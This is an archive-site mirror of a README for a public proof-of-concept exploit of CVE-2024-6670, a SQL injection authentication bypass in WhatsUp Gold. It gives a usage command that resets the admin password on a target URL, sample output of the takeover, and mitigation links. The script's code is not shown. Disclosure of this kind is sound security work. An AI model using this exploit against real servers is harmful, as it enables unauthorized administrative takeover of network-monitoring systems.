Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-6670 PoC — WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability

Source
https://github.com/sinsinology/CVE-2024-6670
Associated Vulnerability
Title:WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
Description:In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
Readme
# CVE-2024-6670
PoC for Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)


A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/

[![ZDI](poc.png)](https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/)



## Usage
```
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/


[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned





```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024

## Manish Kishan Tanwar
If it wasn’t because of the motivation and lessons that my dear friend [Manish](https://x.com/indishell1046) has taught me over the years I have known him, I wouldn’t be able to exploit this bug, thank you my friend.

## Follow Us on Twitter(X) for the latest security research:
*  [SinSinology](https://x.com/SinSinology)
*  [SummoningTeam](https://x.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/0367cdfedbf2cfaed785c1fde1256c6037c3856d
├── [3.8K]  CVE-2024-6670.py
├── [ 44K]  poc.png
└── [2.3K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →